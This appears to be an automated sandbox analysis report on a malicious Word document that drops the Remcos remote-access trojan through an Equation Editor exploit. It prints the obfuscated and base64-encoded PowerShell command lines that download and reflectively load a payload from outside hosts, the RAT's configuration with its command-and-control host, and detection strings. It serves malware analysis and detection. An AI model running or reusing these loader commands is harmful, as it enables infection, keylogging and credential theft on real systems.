Windows Analysis Report
AMG Cargo Logistic.docx

Overview

General Information

Sample name:AMG Cargo Logistic.docx
Analysis ID:1522765
MD5:cde646bbf76aa0cb430f71ec2408b4bd
SHA1:40fbea905916fc49bfcaf203b3b15e78d9053df5
SHA256:a91decdd65e45f46a226097d1331b51002c3c6120c5a2afdb7d29c5973166ce5

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Contains an external reference to another file
Contains functionality to inject code into remote processes
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionality to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs a global keyboard hook
Maps a DLL or memory area into another process
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE-2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Searches for Windows Mail specific files
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file / registry access)
Tries to steal Mail credentials (via file registry)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected WebBrowserPassView password recovery tool
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality to read data from the clipboard
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch or control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potentially Suspicious Execution Of Regasm/Regsvcs From Uncommon Location
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 3272 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
    • EQNEDT32.EXE (PID: 3744 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
      • wscript.exe (PID: 3816 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" MD5: 979D74799EA6C8B8167869A68DF5204A)
        • powershell.exe (PID: 3864 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • powershell.exe (PID: 3952 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
            • RegAsm.exe (PID: 4076 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2736 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2592 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2092 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\zdcjgmqajuavikmhtgirxawvvrrtkae" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2100 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\jxitgxaufcsasqatkrvsifqmdfiulluzow" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 2160 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\manmhp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1908 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1240 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\ohjddwfhhgpyhybdvgvfatodxp" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1692 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 3036 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\qjoweoqbvohlrmpherihlgjmywoyg" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1564 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1256 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
              • RegAsm.exe (PID: 1072 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe /stext "C:\Users\user\AppData\Local\Temp\bdbgfhbcjxzqtsllvbviokedgkxhzxva" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
Name: Remcos, RemcosRAT
Description: Remcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers. Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns. Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user. Remcos is developed by the cybersecurity company BreakingSecurity.
Attribution:
  • APT33
  • The Gorgon Group
  • UAC-0050
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{
  "Host:Port:Password": "maxert.wemnbbsweoipmngbyutrdcunbgrtjeroendns.pro:6845:1",
  "Assigned name": "RemoteHost",
  "Connect interval": "1",
  "Install flag": "Disable",
  "Setup HKCU\\Run": "Enable",
  "Setup HKLM\\Run": "Enable",
  "Install path": "Application path",
  "Copy file": "remcos.exe",
  "Startup value": "Disable",
  "Hide file": "Disable",
  "Mutex": "Rmc-EPF38I",
  "Keylog flag": "1",
  "Keylog path": "Temp",
  "Keylog file": "logs.dat",
  "Keylog crypt": "Disable",
  "Hide keylog file": "Disable",
  "Screenshot flag": "Disable",
  "Screenshot time": "10",
  "Take Screenshot option": "Disable",
  "Take screenshot title": "",
  "Take screenshot time": "5",
  "Screenshot path": "AppData",
  "Screenshot file": "Screenshots",
  "Screenshot crypt": "Disable",
  "Mouse option": "Disable",
  "Delete file": "Disable",
  "Audio record time": "5"
}
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\notpad0\logs.dat | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethedomaindskilltechnologywhichcreatednicepersonentirelifetogetbmebackwithnewthingswithichhonestthingsalwayswantobe______seiscutebabygirlever[1].doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1d84:$obj2: \objdata
  • 0x1d9a:$obj3: \objupdate
  • 0x1d5f:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A16B3B5D.doc | INDICATOR_RTF_MalVer_Objects | Detects RTF documents with non-standard version and embedding one of the objects mostly observed in exploit documents. | ditekSHen
  • 0x1d84:$obj2: \objdata
  • 0x1d9a:$obj3: \objupdate
  • 0x1d5f:$obj6: \objlink
Source | Rule | Description | Author | Strings
0000000D.00000002.953027155.0000000000851000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
0000000D.00000002.952762290.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
Source | Rule | Description | Author | Strings
13.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
13.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_Remcos | Yara detected Remcos RAT | Joe Security
13.2.RegAsm.exe.400000.0.raw.unpack | JoeSecurity_UACBypassusingCMSTP | Yara detected UAC Bypass using CMSTP | Joe Security
13.2.RegAsm.exe.400000.0.raw.unpack | Windows_Trojan_Remcos_b296e965 | unknown | unknown
  • 0x6c4b8:$a1: Remcos restarted by watchdog!
  • 0x6ca30:$a3: %02i:%02i:%02i:%03i
13.2.RegAsm.exe.400000.0.raw.unpack | REMCOS_RAT_variants | unknown | unknown
  • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
  • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
  • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
  • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
  • 0x6657c:$str_b2: Executing file:
  • 0x675fc:$str_b3: GetDirectListeningPort
  • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
  • 0x67128:$str_b7: \update.vbs
  • 0x665a4:$str_b9: Downloaded file:
  • 0x66590:$str_b10: Downloading file:
  • 0x66634:$str_b12: Failed to upload file:
  • 0x675c4:$str_b13: StartForward
  • 0x675e4:$str_b14: StopForward
  • 0x67080:$str_b15: fso.DeleteFile "
  • 0x67014:$str_b16: On Error Resume Next
  • 0x670b0:$str_b17: fso.DeleteFolder "
  • 0x66624:$str_b18: Uploaded file:
  • 0x665e4:$str_b19: Unable to delete:
  • 0x67048:$str_b20: while fso.FileExists("
  • 0x66ac1:$str_c0: [Firefox StoredLogins not found]

                  Exploits

Source: Network Connection | Author: Joe Security | Data: DestinationIp: 91.134.96.177, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49171
Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3744, TargetFilename: C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs

                  System Summary

                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49171, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3744, Protocol: tcp, SourceIp: 91.134.96.177, SourceIsIpv6: false, SourcePort: 80
                  Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, 
Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f [ChAr]34,[ChAr]39,[ChAr]36))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( ([StrInG]$veRbosEPREfeRENCE)[1,3]+'X'-Join'') ((('{2}'+'ur'+'l'+' = {'+'1}'+'ht'+'t'+'p'+'s://'+'r'+'a'+'w.gith'+'ubusercontent.'+'c'+'om/N'+'oDetectO'+'n/'+'N'+'oDete'+'c'+'tOn/'+'r'+'efs'+'/heads/ma'+'in/'+'Deta'+'hNoth-'+'V.t'+'xt{1}; {2}base'+'64Content = (New-Ob'+'ject System'+'.'+'Net.W'+'ebClient).Do'+'wnloadStri'+'ng({2}url);'+' {2'+'}binar'+'yContent = [System.'+'Conve'+'rt]::Fr'+'omBa'+'se64S'+'t'+'ring({2}base64Conte'+'nt); {2}assembly = '+'[Refle'+'ctio'+'n.Assembly]::L'+'oad({2'+'}bi'+'na'+'r'+'yC'+'onte'+'nt); ['+'dnl'+'ib.'+'IO.'+'Hom'+'e]::'+'V'+'AI'+'('+'{0}tx'+'t.C'+'FDR'+'RW/'+'08/771.6'+'9.431.19//:pt'+'th{0}, {0}desativ'+'ado{'+'0}'+', {0}desa'+'tivado{'+'0},'+' {0}desativ'+'ado{0'+'}, {0}'+'RegAs'+'m{0}'+', {'+'0'+'}'+'{'+'0},{0}{0'+'})') -f 
[ChAr]34,[ChAr]39,[ChAr]36))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, FPT.EagleEye Team, Vadim Khrykov, Cyb3rEng, Michael Haag, Christopher Peacock @securepeacock, @scythe_io: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 3744, ParentProcessName: EQNEDT32.EXE, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\picturewithherimagesverygoodforyourhear.Vbs" , ProcessId: 3816, ProcessName: wscript.exe
                  Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggKFtTdHJJbkddJHZlUmJvc0VQUkVmZVJFTkNFKVsxLDNdKydYJy1Kb2luJycpICgoKCd7Mn0nKyd1cicrJ2wnKycgPSB7JysnMX0nKydodCcrJ3QnKydwJysnczovLycrJ3InKydhJysndy5naXRoJysndWJ1c2VyY29udGVudC4nKydjJysnb20vTicrJ29EZXRlY3RPJysnbi8nKydOJysnb0RldGUnKydjJysndE9uLycrJ3InKydlZnMnKycvaGVhZHMvbWEnKydpbi8nKydEZXRhJysnaE5vdGgtJysnVi50JysneHR7MX07IHsyfWJhc2UnKyc2NENvbnRlbnQgPSAoTmV3LU9iJysnamVjdCBTeXN0ZW0nKycuJysnTmV0LlcnKydlYkNsaWVudCkuRG8nKyd3bmxvYWRTdHJpJysnbmcoezJ9dXJsKTsnKycgezInKyd9YmluYXInKyd5Q29udGVudCA9IFtTeXN0ZW0uJysnQ29udmUnKydydF06OkZyJysnb21CYScrJ3NlNjRTJysndCcrJ3JpbmcoezJ9YmFzZTY0Q29udGUnKydudCk7IHsyfWFzc2VtYmx5ID0gJysnW1JlZmxlJysnY3RpbycrJ24uQXNzZW1ibHldOjpMJysnb2FkKHsyJysnfWJpJysnbmEnKydyJysneUMnKydvbnRlJysnbnQpOyBbJysnZG5sJysnaWIuJysnSU8uJysnSG9tJysnZV06OicrJ1YnKydBSScrJygnKyd7MH10eCcrJ3QuQycrJ0ZEUicrJ1JXLycrJzA4Lzc3MS42JysnOS40MzEuMTkvLzpwdCcrJ3RoezB9LCB7MH1kZXNhdGl2JysnYWRveycrJzB9JysnLCB7MH1kZXNhJysndGl2YWRveycrJzB9LCcrJyB7MH1kZXNhdGl2JysnYWRvezAnKyd9LCB7MH0nKydSZWdBcycrJ217MH0nKycsIHsnKycwJysnfScrJ3snKycwfSx7MH17MCcrJ30pJykgLWYgIFtDaEFyXTM0LFtDaEFyXTM5LFtDaEFyXTM2KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 